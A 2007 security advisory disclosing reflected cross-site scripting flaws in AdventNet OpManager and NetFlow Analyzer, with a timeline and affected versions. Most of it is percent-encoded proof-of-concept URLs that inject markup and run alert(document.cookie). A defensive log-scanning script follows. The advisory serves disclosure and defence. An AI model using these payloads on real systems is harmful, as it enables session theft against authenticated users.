###################################################
NetFlow Analyzer 5 & OpManager 7 multiple XSS
vendor url: http://www.adventnet.com/
advisory: http://lostmon.blogspot.com/2007/07/netflow-analizer-5-opmanager-7-multiple.html
vendor notified: yes exploits included: yes
Secunia: SA25947, SA20067
BID: 24767, 24766
SecWatch: SWID1018376, SWID1018377
###################################################
NetFlow Analyzer and OpManager contain a flaw that allows
a remote cross-site scripting attack. This flaw exists
because the application does not validate multiple parameters
upon submission to multiple scripts. This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions affected:
#####################
OpManager 7
OpManager 6
NetFlow Analyzer 5
Other versions may be vulnerable too.
###################
Solution:
###################
No solution was available at this time.
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
Exploiting some of these flaws requires being logged in.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analyzer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
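
Added example (not part of the original advisory): with no fix available, one way to spot requests like the ones above is to scan web access logs for the listed paths and flag parameters whose decoded value contains HTML markup. Only the paths come from the advisory; the log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Paths copied from the example URLs in the advisory above.
ADVISORY_PATHS = {
    "/map/ping.do", "/map/traceRoute.do", "/devices/Search.do",
    "/reports/ReportViewAction.do", "/admin/ServiceConfiguration.do",
    "/admin/DeviceAssociation.do", "/netflow/jspui/applicationList.jsp",
    "/netflow/jspui/appConfig.jsp", "/netflow/jspui/index.jsp",
    "/netflow/jspui/selectDevice.jsp", "/netflow/jspui/customReport.jsp",
}
# A quote followed by '>' (attribute break-out) or the start of any tag.
MARKUP = re.compile(r"""["']\s*>|<\s*/?\s*[a-zA-Z!]""")
# Assumed access-log shape: the request line appears in double quotes.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return (path, [parameter names]) for a flagged request, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path not in ADVISORY_PATHS:
        return None
    hits = [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if MARKUP.search(fully_decode(value))]
    return (url.path, hits) if hits else None

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jul/2007:10:00:00 +0000] "GET /map/ping.do?name=192.168.1.2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Jul/2007:10:00:01 +0000] "GET /map/ping.do?name=192.168.1.2%22%3E%3Ch1%3Etest%3C%2Fh1%3E HTTP/1.1" 200 734',
    '10.0.0.9 - - [04/Jul/2007:10:00:02 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups%2522%253E%253Cb%253E&grDisp=1 HTTP/1.1" 200 901',
    '10.0.0.7 - - [04/Jul/2007:10:00:03 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

The third sample line is double-encoded and is still flagged; the fourth is ignored because its path is not one of those listed in the advisory.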
#################### €nd ################################
Thanks to estrella for being my light.
Thanks to all Lostmon Team !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....